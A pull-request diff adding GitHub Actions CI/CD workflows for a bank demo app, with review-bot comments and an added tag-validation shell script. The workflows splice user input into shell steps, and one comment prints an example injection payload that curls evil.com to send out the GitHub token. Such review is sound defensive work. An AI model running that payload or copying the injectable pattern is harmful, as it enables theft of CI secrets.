76 changes: 76 additions & 0 deletions .github/workflows/cd.yml
@@ -0,0 +1,76 @@
name: CD Pipeline

on:
workflow_call:
inputs:
DOCKER_TAG:
description: 'Docker tag of the image built by the CI job'
required: true
type: string
workflow_dispatch:
inputs:
DOCKER_TAG:
description: 'Docker tag of the image built by the CI job'
required: true
type: string

permissions:
contents: write

jobs:
deploy:
runs-on: ubuntu-latest

steps:
- name: Checkout code
uses: actions/checkout@v4
with:
ref: ${{ github.ref }}
token: ${{ secrets.GITHUB_TOKEN }}

- name: Verify Docker image tag
run: echo "DOCKER TAG RECEIVED - ${{ inputs.DOCKER_TAG }}"

- name: Update Kubernetes manifest
run: |
sed -i -e 's|trainwithshubham/bankapp-eks:.*|trainwithshubham/bankapp-eks:${{ inputs.DOCKER_TAG }}|g' kubernetes/bankapp-deployment.yml
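Review bot: the sed in the "Update Kubernetes manifest" step never checks that its pattern matched, so if the manifest's image line does not read trainwithshubham/bankapp-eks:... the file is left untouched and the job still succeeds, with the later commit step reporting "No changes to commit". Add a post-check such as grep -q "bankapp-eks:${DOCKER_TAG}" kubernetes/bankapp-deployment.yml || exit 1 (with the tag supplied through env: rather than interpolated) so a silent no-op fails the run instead of going green. The token: ${{ secrets.GITHUB_TOKEN }} on the checkout step is also the action's default and can be dropped.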
Comment on lines +32 to +36
🔴 Script injection vulnerability via unsanitized inputs.DOCKER_TAG in shell commands

Multiple run: steps directly interpolate ${{ inputs.DOCKER_TAG }} (and ${{ github.event.inputs.DOCKER_TAG }}) into shell commands. Since workflow_dispatch allows users to supply arbitrary string input for DOCKER_TAG, a malicious value like v1"; curl http://evil.com/steal?t=$(cat $GITHUB_TOKEN); echo " could execute arbitrary commands. This affects ci.yml:31-32, cd.yml:32, cd.yml:36, and cd.yml:47. The safe pattern is to assign the expression to an environment variable first and reference it as $DOCKER_TAG in the shell.

Example of safe pattern
env:
  DOCKER_TAG: ${{ inputs.DOCKER_TAG }}
run: |
  echo "DOCKER TAG RECEIVED - $DOCKER_TAG"
Prompt for agents
In cd.yml, lines 32, 36, and 47 all directly interpolate ${{ inputs.DOCKER_TAG }} into shell run commands. This is a GitHub Actions script injection vulnerability because the DOCKER_TAG input can contain arbitrary characters when triggered via workflow_dispatch. The fix is to assign the input to an environment variable in each step (using env: DOCKER_TAG: ${{ inputs.DOCKER_TAG }}) and then reference it as $DOCKER_TAG in the shell script. The same issue exists in ci.yml lines 31-32 with ${{ github.event.inputs.DOCKER_TAG }}. All four occurrences across both files need to be fixed.

- name: Commit and push changes
run: |
git config user.name "github-actions[bot]"
git config user.email "github-actions[bot]@users.noreply.github.com"
echo "Checking repository status:"
git status
echo "Adding changes to git:"
git add kubernetes/bankapp-deployment.yml
echo "Committing changes:"
git commit -m "Updated K8s Deployment Docker Image Version to ${{ inputs.DOCKER_TAG }}" || echo "No changes to commit"
echo "Pushing changes to github:"
git push

- name: Send deployment notification email
if: always()
uses: dawidd6/action-send-mail@v3
with:
server_address: ${{ secrets.MAIL_SERVER }}
server_port: ${{ secrets.MAIL_PORT }}
username: ${{ secrets.MAIL_USERNAME }}
password: ${{ secrets.MAIL_PASSWORD }}
subject: "BankApp Application has been updated and deployed - ${{ job.status }}"
to: ${{ secrets.NOTIFICATION_EMAIL }}
from: ${{ secrets.MAIL_USERNAME }}
content_type: text/html
body: |
<html>
<body>
<div style="background-color: #FFA07A; padding: 10px; margin-bottom: 10px;">
<p style="color: black; font-weight: bold;">Project: ${{ github.repository }}</p>
</div>
<div style="background-color: #90EE90; padding: 10px; margin-bottom: 10px;">
<p style="color: black; font-weight: bold;">Build Number: ${{ github.run_number }}</p>
</div>
<div style="background-color: #87CEEB; padding: 10px; margin-bottom: 10px;">
<p style="color: black; font-weight: bold;">URL: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}</p>
</div>
</body>
</html>
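Review bot: in the "Commit and push changes" step, git commit ... || echo "No changes to commit" swallows every commit failure (a hook rejecting the commit, an index lock, a misconfigured identity), not only the empty-diff case, and git push then runs regardless. Test for an empty index explicitly after git add, e.g. git diff --cached --quiet && { echo "No changes to commit"; exit 0; }, and let a real commit error fail the step. The commit message also splices ${{ inputs.DOCKER_TAG }} straight into the shell line; route it through env: and $DOCKER_TAG as the earlier comment recommends for the other run: steps.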
106 changes: 106 additions & 0 deletions .github/workflows/ci.yml
@@ -0,0 +1,106 @@
name: CI Pipeline

on:
push:
branches: [main, DevOps]
pull_request:
branches: [main, DevOps]
workflow_dispatch:
inputs:
DOCKER_TAG:
description: 'Docker image tag for the build'
required: true
type: string

permissions:
contents: write

jobs:
build:
runs-on: ubuntu-latest
outputs:
docker_tag: ${{ steps.set-tag.outputs.docker_tag }}

steps:
- name: Checkout code
uses: actions/checkout@v4

- name: Set Docker tag
id: set-tag
run: |
if [ -n "${{ github.event.inputs.DOCKER_TAG }}" ]; then
echo "docker_tag=${{ github.event.inputs.DOCKER_TAG }}" >> "$GITHUB_OUTPUT"
else
echo "docker_tag=${GITHUB_SHA::7}" >> "$GITHUB_OUTPUT"
fi

- name: Trivy filesystem scan
uses: aquasecurity/trivy-action@master
with:
scan-type: 'fs'
scan-ref: '.'

- name: OWASP Dependency Check
uses: dependency-check/Dependency-Check_Action@main
with:
project: 'bankapp'
path: '.'
format: 'XML'
out: '.'

- name: Upload OWASP Dependency Check report
uses: actions/upload-artifact@v4
if: always()
with:
name: dependency-check-report
path: dependency-check-report.xml

- name: SonarQube Analysis
if: ${{ secrets.SONAR_TOKEN != '' && secrets.SONAR_HOST_URL != '' }}
uses: sonarsource/sonarqube-scan-action@v6
env:
SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}
SONAR_HOST_URL: ${{ secrets.SONAR_HOST_URL }}
with:
args: >
-Dsonar.projectName=bankapp
-Dsonar.projectKey=bankapp

- name: SonarQube Quality Gate
if: ${{ secrets.SONAR_TOKEN != '' && secrets.SONAR_HOST_URL != '' }}
uses: sonarsource/sonarqube-quality-gate-action@master
timeout-minutes: 1
continue-on-error: true
env:
SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}
SONAR_HOST_URL: ${{ secrets.SONAR_HOST_URL }}

- name: Log in to Docker Hub
if: ${{ secrets.DOCKERHUB_USERNAME != '' && secrets.DOCKERHUB_TOKEN != '' }}
uses: docker/login-action@v3
with:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}

- name: Build and push Docker image
if: ${{ secrets.DOCKERHUB_USERNAME != '' && secrets.DOCKERHUB_TOKEN != '' }}
uses: docker/build-push-action@v5
with:
context: .
push: true
tags: ${{ secrets.DOCKERHUB_USERNAME }}/bankapp:${{ steps.set-tag.outputs.docker_tag }}
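Review bot: three third-party actions are referenced by mutable branch names, aquasecurity/trivy-action@master, dependency-check/Dependency-Check_Action@main and sonarsource/sonarqube-quality-gate-action@master, so a force-push to or compromise of those branches changes what executes in a job that holds contents: write and the Docker Hub token; pin each to a full commit SHA with the version in a trailing comment, as the checkout, login and build-push steps already pin by tag. Separately, neither scanner can block the build as written: the Trivy step sets no exit-code or severity, so findings are printed but do not fail the step, and the quality-gate step has continue-on-error: true, so its verdict is discarded. Decide which findings should fail CI and configure those inputs accordingly.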
🔴 Docker image name mismatch between CI build and CD deployment

The CI pipeline builds and pushes the Docker image to ${{ secrets.DOCKERHUB_USERNAME }}/bankapp:<tag> (ci.yml:91), but the CD pipeline updates the Kubernetes manifest to reference trainwithshubham/bankapp-eks:<tag> (cd.yml:36). Even if DOCKERHUB_USERNAME is trainwithshubham, the image repository names differ: bankapp vs bankapp-eks. This means the K8s deployment will be updated to reference an image tag that was never pushed to the bankapp-eks repository, causing the deployment to pull a non-existent (or stale) image and likely fail with an ImagePullBackOff error.

Prompt for agents
The CI pipeline pushes the Docker image to the repository named 'bankapp' (ci.yml:91 uses secrets.DOCKERHUB_USERNAME/bankapp:tag), but the CD pipeline's sed command in cd.yml:36 updates the Kubernetes manifest to reference 'trainwithshubham/bankapp-eks:tag'. These are two different Docker image repositories. You need to make the image names consistent. Either change ci.yml line 91 to push to '<username>/bankapp-eks' to match what cd.yml expects, or change cd.yml line 36's sed replacement to use the same '<username>/bankapp' repository that CI pushes to. The Kubernetes deployment manifest (kubernetes/bankapp-deployment.yml:20) currently uses 'trainwithshubham/bankapp-eks:v2', so you would also need to update it if you change the repository name. Also consider using the DOCKERHUB_USERNAME secret in cd.yml instead of the hardcoded 'trainwithshubham' to keep it consistent with ci.yml.

- name: Upload build artifacts
uses: actions/upload-artifact@v4
if: success()
with:
name: build-artifacts
path: '**/*.xml'

deploy:
needs: build
if: success() && (github.event_name == 'push' || github.event_name == 'workflow_dispatch')
uses: ./.github/workflows/cd.yml
with:
DOCKER_TAG: ${{ needs.build.outputs.docker_tag }}
secrets: inherit
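Review bot: secrets: inherit forwards every repository and organization secret to cd.yml, but the called workflow only reads MAIL_SERVER, MAIL_PORT, MAIL_USERNAME, MAIL_PASSWORD, NOTIFICATION_EMAIL and the GITHUB_TOKEN. Declare those under workflow_call.secrets in cd.yml and pass them explicitly here, so a later edit to the deploy workflow cannot quietly start using DOCKERHUB_TOKEN or SONAR_TOKEN. The build-artifacts upload with path '**/*.xml' also re-uploads the dependency-check-report.xml already published by the step above; narrow the glob or drop one of the two uploads.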
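The script-injection comment on cd.yml above recommends moving the tag into an environment variable. The following is an added example, not code from this PR or its author: a POSIX shell guard that additionally allowlists the tag against the Docker tag grammar before it reaches sed or git, plus a manifest rewrite that takes the tag from a shell variable instead of a ${{ }} expression. The function names (is_valid_docker_tag, update_manifest_image, demo_rewrite) and the in-memory sample manifest are constructed for illustration; in a workflow the functions would run inside a run: step with DOCKER_TAG supplied via env:.

```shell
#!/bin/sh
# Added example, not part of the PR: validate DOCKER_TAG before it reaches sed/git.
# Function names and the sample manifest below are constructed for illustration.

nl='
'

# Succeeds (returns 0) only when $1 matches the Docker tag grammar:
# 1-128 characters, first [A-Za-z0-9_], the rest [A-Za-z0-9_.-].
# Quotes, ';', '$', '|', '&', '\' and whitespace are all rejected, so a value
# shaped like the payload quoted in the review comment cannot pass, and a
# value that does pass is also safe inside a sed replacement delimited by '|'.
is_valid_docker_tag() {
  tag=$1
  case "$tag" in
    '' | *"$nl"*) return 1 ;;   # empty or multi-line values are out
  esac
  [ "${#tag}" -le 128 ] || return 1
  printf '%s\n' "$tag" | grep -Eq '^[A-Za-z0-9_][A-Za-z0-9_.-]*$'
}

# Rewrites every "<repo>:<oldtag>" reference in the manifest read from stdin
# to "<repo>:<newtag>" and writes the result to stdout.
#   $1 = image repository (e.g. trainwithshubham/bankapp-eks), $2 = new tag
# The tag arrives as a shell variable (a workflow would set it through env:),
# never as a ${{ }} expression spliced into the script text.
update_manifest_image() {
  repo=$1
  newtag=$2
  is_valid_docker_tag "$newtag" || {
    printf 'refusing to use unsafe DOCKER_TAG: %s\n' "$newtag" >&2
    return 1
  }
  sed -e "s|$repo:[^[:space:]]*|$repo:$newtag|g"
}

# Runs update_manifest_image over a constructed manifest and, like the
# post-check a CD step should perform, fails unless the new tag is present.
# Prints the rewritten manifest; returns 1 if the rewrite was refused or
# did not take effect.
demo_rewrite() {
  manifest='apiVersion: apps/v1
kind: Deployment
spec:
  template:
    spec:
      containers:
        - name: bankapp
          image: trainwithshubham/bankapp-eks:v2'
  out=$(printf '%s\n' "$manifest" | update_manifest_image trainwithshubham/bankapp-eks "$1") || return 1
  printf '%s\n' "$out"
  printf '%s\n' "$out" | grep -q "bankapp-eks:$1"
}

if demo_rewrite v3 >/dev/null; then
  echo "ok: tag v3 written to the manifest"
fi
if ! demo_rewrite 'v1"; echo injected; echo "' >/dev/null 2>&1; then
  echo "ok: injection-shaped tag rejected before sed ran"
fi
```

The allowlist is deliberately stricter than "escape the dangerous characters": a CI tag is either a version string or a short commit hash, so anything outside the Docker grammar is a bug or an attack and is refused outright, which also keeps sed's replacement text free of metacharacters.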